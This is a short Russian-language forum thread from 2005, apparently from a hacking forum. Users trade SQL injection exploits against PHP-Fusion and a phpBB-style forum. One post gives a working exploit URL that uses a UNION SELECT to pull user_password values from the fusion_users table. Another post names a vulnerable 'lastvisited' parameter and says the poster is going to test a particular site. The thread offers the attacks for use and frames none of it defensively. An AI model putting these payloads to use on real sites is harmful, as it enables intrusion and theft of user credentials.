GreenBear
26.11.2005, 21:13
http://site.ru/messages.php?folder=inbox&show='SQL-Injection
P.S/ нужна быть залогиненым
Вот сплоит:
---
http://127.0.0.1/php-files/messages.php?folder=inbox&show=H'%20union%20select%201,1,1,user_password,1,1 ,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 ,1,1+from+fusion_users/*
---
africanec
27.11.2005, 01:31
http://www.victim.ru/forum/viewforum.php?forum_id=1&lastvisited='sql-inj
аналогично залогиненый только
пошол Медведевскую проверять
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot